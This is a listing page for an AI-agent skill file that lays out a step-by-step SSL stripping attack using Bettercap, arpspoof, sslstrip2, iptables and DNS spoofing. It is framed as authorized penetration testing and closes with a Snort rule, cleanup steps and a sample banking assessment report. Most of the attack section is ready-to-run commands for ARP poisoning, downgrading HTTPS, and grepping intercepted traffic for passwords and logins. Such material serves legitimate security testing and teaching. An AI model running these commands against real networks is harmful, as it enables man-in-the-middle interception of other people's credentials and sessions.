performing-ssl-stripping-attack
Simulates SSL stripping attacks using sslstrip, Bettercap, and mitmproxy in authorized environments to test HSTS enforcement, certificate validation, and HTTPS upgrade mechanisms that protect users from downgrade attacks on encrypted connections.
Best use case
performing-ssl-stripping-attack is best used when you need a repeatable AI agent workflow instead of a one-off prompt.
Simulates SSL stripping attacks using sslstrip, Bettercap, and mitmproxy in authorized environments to test HSTS enforcement, certificate validation, and HTTPS upgrade mechanisms that protect users from downgrade attacks on encrypted connections.
Teams using performing-ssl-stripping-attack should expect a more consistent output, faster repeated execution, less prompt rewriting.
When to use this skill
- You want a reusable workflow that can be run more than once with consistent structure.
When not to use this skill
- You only need a quick one-off answer and do not need a reusable workflow.
- You cannot install or maintain the underlying files, dependencies, or repository context.
Installation
Claude Code / Cursor / Codex
Manual Installation
- Download SKILL.md from GitHub
- Place it in
.claude/skills/performing-ssl-stripping-attack/SKILL.mdinside your project - Restart your AI agent — it will auto-discover the skill
How performing-ssl-stripping-attack Compares
| Feature / Agent | performing-ssl-stripping-attack | Standard Approach |
|---|---|---|
| Platform Support | Not specified | Limited / Varies |
| Context Awareness | High | Baseline |
| Installation Complexity | Unknown | N/A |
Frequently Asked Questions
What does this skill do?
Simulates SSL stripping attacks using sslstrip, Bettercap, and mitmproxy in authorized environments to test HSTS enforcement, certificate validation, and HTTPS upgrade mechanisms that protect users from downgrade attacks on encrypted connections.
Where can I find the source code?
You can find the source code on GitHub using the link provided at the top of the page.
SKILL.md Source
# Performing SSL Stripping Attack ## When to Use - Testing whether web applications properly enforce HTTPS through HSTS headers and redirect chains - Validating that HSTS preloading is correctly configured and registered in browser preload lists - Demonstrating the risk of cleartext HTTP to stakeholders during authorized security assessments - Assessing whether internal applications and thick clients validate TLS certificates and reject downgrades - Training SOC teams to detect SSL stripping indicators in network traffic **Do not use** against networks or applications without explicit written authorization, to intercept real user credentials, or against production systems during business hours without change management approval. ## Prerequisites - Written authorization specifying in-scope applications and approved attack techniques - Bettercap 2.x or sslstrip2 installed on the attacker machine - ARP spoofing or other MITM positioning established (see ARP spoofing skill) - IP forwarding enabled on the attacker machine - Wireshark for verifying attack success and capturing evidence - Test accounts (not real user credentials) for demonstrating credential interception > **Legal Notice:** This skill is for authorized security testing and educational purposes only. Unauthorized use against systems you do not own or have written permission to test is illegal and may violate computer fraud laws. ## Workflow ### Step 1: Establish MITM Position ```bash # Enable IP forwarding sudo sysctl -w net.ipv4.ip_forward=1 # Position via ARP spoofing using Bettercap sudo bettercap -iface eth0 -eval "set arp.spoof.targets 192.168.1.50; arp.spoof on" # Alternatively, use arpspoof from dsniff sudo arpspoof -i eth0 -t 192.168.1.50 -r 192.168.1.1 & ``` ### Step 2: Execute SSL Stripping with Bettercap ```bash # Start Bettercap with SSL stripping sudo bettercap -iface eth0 # Enable ARP spoofing > set arp.spoof.targets 192.168.1.50 > set arp.spoof.fullduplex true > arp.spoof on # Enable HTTP proxy with SSL stripping > set http.proxy.sslstrip true > set http.proxy.port 8080 > http.proxy on # Enable network sniffer for credential capture > set net.sniff.verbose true > net.sniff on # Watch for intercepted HTTP traffic (was HTTPS) # Bettercap will show credentials and URLs in real-time ``` ### Step 3: Execute SSL Stripping with sslstrip2 ```bash # Configure iptables to redirect HTTP traffic through sslstrip sudo iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000 # Start sslstrip sudo sslstrip2 -l 10000 -w sslstrip_log.txt # In another terminal, monitor the log for intercepted credentials tail -f sslstrip_log.txt | grep -i "pass\|user\|login\|email" # sslstrip works by: # 1. Intercepting HTTP responses containing HTTPS links # 2. Replacing https:// with http:// in the response # 3. Maintaining HTTPS connection to the real server # 4. Serving downgraded HTTP to the victim ``` ### Step 4: Test HSTS Bypass Techniques ```bash # Check if target has HSTS header curl -sI https://target-app.example.com | grep -i strict-transport-security # Check if target is on the HSTS preload list curl -s "https://hstspreload.org/api/v2/status?domain=example.com" | python3 -m json.tool # Test HSTS bypass via subdomain substitution # sslstrip2 can replace URLs with similar-looking HTTP alternatives: # https://accounts.google.com -> http://accounts.google.com (fails if HSTS) # https://accounts.google.com -> http://accounts.google.com. (trailing dot bypass attempt) # Bettercap HSTS bypass with DNS spoofing sudo bettercap -iface eth0 > set arp.spoof.targets 192.168.1.50 > arp.spoof on > set dns.spoof.domains target-app.example.com > set dns.spoof.address 192.168.1.99 > dns.spoof on > set http.proxy.sslstrip true > http.proxy on # For applications not on HSTS preload, clear HSTS cache in test browser: # Chrome: chrome://net-internals/#hsts -> Delete domain security policies # Firefox: Clear recent history -> Active Logins (resets HSTS) ``` ### Step 5: Validate Detection and Controls ```bash # Check from victim's perspective: # 1. Browser address bar should show http:// instead of https:// # 2. No padlock icon visible # 3. If HSTS is effective, browser should show error and refuse connection # Capture evidence of the downgrade tshark -i eth0 -f "host 192.168.1.50 and port 80" \ -T fields -e frame.time -e ip.src -e ip.dst -e http.host -e http.request.uri \ -Y "http.request" > ssl_strip_evidence.txt # Verify what the victim sees vs what goes to the real server # Victim to attacker: HTTP (port 80, cleartext) tshark -i eth0 -f "src host 192.168.1.50 and dst port 80" -c 20 # Attacker to real server: HTTPS (port 443, encrypted) tshark -i eth0 -f "dst port 443 and dst host <real_server_ip>" -c 20 # Check IDS/SIEM for detection # Snort rule that should detect SSL stripping indicators: # alert tcp any any -> $HOME_NET 80 (msg:"Possible SSL Strip - Login form over HTTP"; # flow:to_client,established; content:"type=\"password\""; nocase; # content:"http://"; nocase; sid:9000010;) # Check for HSTS missing header alerts curl -s http://target-app.example.com | grep -i "password\|login" # If login form is served over HTTP, SSL stripping succeeded ``` ### Step 6: Clean Up and Report ```bash # Stop SSL stripping # In Bettercap: > http.proxy off > arp.spoof off > quit # Remove iptables rules sudo iptables -t nat -F PREROUTING # Disable IP forwarding sudo sysctl -w net.ipv4.ip_forward=0 # Kill background processes sudo killall sslstrip2 arpspoof 2>/dev/null # Verify network is restored ping -c 1 192.168.1.1 ``` ## Key Concepts | Term | Definition | |------|------------| | **SSL Stripping** | Downgrade attack that intercepts HTTP-to-HTTPS redirects, maintaining encrypted connection to the server while serving cleartext HTTP to the victim | | **HSTS (HTTP Strict Transport Security)** | HTTP response header that instructs browsers to only connect via HTTPS for a specified duration, preventing SSL stripping in subsequent visits | | **HSTS Preloading** | Submission of domains to browser-maintained lists that enforce HTTPS from the very first connection, closing the first-visit vulnerability window | | **Certificate Transparency** | Public logging framework for TLS certificates that enables detection of misissued certificates but does not prevent SSL stripping | | **Mixed Content** | Web pages served over HTTPS that load resources (scripts, images) over HTTP, creating partial downgrade vulnerability | | **Upgrade-Insecure-Requests** | CSP directive that instructs browsers to upgrade HTTP requests to HTTPS, complementing HSTS for mixed content prevention | ## Tools & Systems - **Bettercap 2.x**: Network attack framework with integrated SSL stripping, HTTP/HTTPS proxying, and credential sniffing - **sslstrip2**: Dedicated SSL stripping tool that transparently downgrades HTTPS to HTTP with URL rewriting - **mitmproxy**: TLS-intercepting proxy that can modify response headers to remove HSTS and other security headers - **curl**: Command-line tool for testing HSTS headers, redirect chains, and certificate validation - **hstspreload.org**: Public HSTS preload list checker for verifying domain inclusion in browser preload databases ## Common Scenarios ### Scenario: Testing HSTS Implementation on a Banking Web Application **Context**: A bank deployed HSTS on their online banking portal (banking.example.com) six months ago and wants to verify it effectively prevents SSL stripping. The assessment is authorized to test from a workstation on the same VLAN as the test environment using dedicated test accounts. **Approach**: 1. Verify HSTS header presence and values: `curl -sI https://banking.example.com | grep -i strict` reveals `max-age=31536000; includeSubDomains; preload` 2. Check HSTS preload status: confirmed the domain is on Chrome and Firefox preload lists 3. Set up Bettercap with ARP spoofing and SSL stripping against a test workstation 4. Attempt to access banking.example.com from the test workstation -- Chrome refuses connection with NET::ERR_CERT_AUTHORITY_INVALID (HSTS prevents downgrade) 5. Test with a fresh browser profile (no HSTS cache) -- still blocked because domain is preloaded 6. Test the bank's mobile app -- app successfully connects over HTTP (does not enforce HSTS), exposing credentials in cleartext 7. Test subdomain api.banking.example.com -- not on preload list, SSL stripping succeeds on first visit before HSTS header is cached **Pitfalls**: - Testing with a browser that already has HSTS cached for the target domain and concluding HSTS works, when a first-time visitor might be vulnerable - Not testing subdomains separately -- `includeSubDomains` only works after the parent domain's HSTS header is received - Forgetting to test mobile applications which may not respect HSTS headers at all - Not checking for mixed content that could leak session tokens even with HSTS enabled ## Output Format ``` ## SSL Stripping Assessment Report **Test ID**: SSL-STRIP-2024-001 **Target Application**: banking.example.com **Test Date**: 2024-03-15 ### HSTS Configuration | Property | Value | Status | |----------|-------|--------| | HSTS Header Present | Yes | PASS | | max-age | 31536000 (1 year) | PASS | | includeSubDomains | Yes | PASS | | preload | Yes | PASS | | In Chrome Preload List | Yes | PASS | ### SSL Stripping Test Results | Target | Client | HSTS Status | Strip Result | |--------|--------|-------------|--------------| | banking.example.com | Chrome (cached) | Active | BLOCKED | | banking.example.com | Chrome (fresh) | Preloaded | BLOCKED | | banking.example.com | Mobile App | Not Enforced | VULNERABLE | | api.banking.example.com | Chrome (fresh) | Not Preloaded | VULNERABLE (first visit) | ### Recommendations 1. Implement TLS certificate pinning in the mobile banking app (Critical) 2. Submit api.banking.example.com to HSTS preload list separately 3. Add Content-Security-Policy: upgrade-insecure-requests header 4. Implement certificate transparency monitoring for the domain ```
Related Skills
recovering-from-ransomware-attack
Executes structured recovery from a ransomware incident following NIST and CISA frameworks, including environment isolation, forensic evidence preservation, clean infrastructure rebuild, prioritized system restoration from verified backups, credential reset, and validation against re-infection. Covers Active Directory recovery, database restoration, and application stack rebuild in dependency order. Activates for requests involving ransomware recovery, post-encryption restoration, or disaster recovery from ransomware.
performing-yara-rule-development-for-detection
Develop precise YARA rules for malware detection by identifying unique byte patterns, strings, and behavioral indicators in executable files while minimizing false positives.
performing-wireless-security-assessment-with-kismet
Conduct wireless network security assessments using Kismet to detect rogue access points, hidden SSIDs, weak encryption, and unauthorized clients through passive RF monitoring.
performing-wireless-network-penetration-test
Execute a wireless network penetration test to assess WiFi security by capturing handshakes, cracking WPA2/WPA3 keys, detecting rogue access points, and testing wireless segmentation using Aircrack-ng and related tools.
performing-windows-artifact-analysis-with-eric-zimmerman-tools
Perform comprehensive Windows forensic artifact analysis using Eric Zimmerman's open-source EZ Tools suite including KAPE, MFTECmd, PECmd, LECmd, JLECmd, and Timeline Explorer for parsing registry hives, prefetch files, event logs, and file system metadata.
performing-wifi-password-cracking-with-aircrack
Captures WPA/WPA2 handshakes and performs offline password cracking using aircrack-ng, hashcat, and dictionary attacks during authorized wireless security assessments to evaluate passphrase strength and wireless network security posture.
performing-web-cache-poisoning-attack
Exploiting web cache mechanisms to serve malicious content to other users by poisoning cached responses through unkeyed headers and parameters during authorized security tests.
performing-web-cache-deception-attack
Execute web cache deception attacks by exploiting path normalization discrepancies between CDN caching layers and origin servers to cache and retrieve sensitive authenticated content.
performing-web-application-vulnerability-triage
Triage web application vulnerability findings from DAST/SAST scanners using OWASP risk rating methodology to separate true positives from false positives and prioritize remediation.
performing-web-application-scanning-with-nikto
Nikto is an open-source web server and web application scanner that tests against over 7,000 potentially dangerous files/programs, checks for outdated versions of over 1,250 servers, and identifies ve
performing-web-application-penetration-test
Performs systematic security testing of web applications following the OWASP Web Security Testing Guide (WSTG) methodology to identify vulnerabilities in authentication, authorization, input validation, session management, and business logic. The tester uses Burp Suite as the primary interception proxy alongside manual testing techniques to find flaws that automated scanners miss. Activates for requests involving web app pentest, OWASP testing, application security assessment, or web vulnerability testing.
performing-web-application-firewall-bypass
Bypass Web Application Firewall protections using encoding techniques, HTTP method manipulation, parameter pollution, and payload obfuscation to deliver SQL injection, XSS, and other attack payloads past WAF detection rules.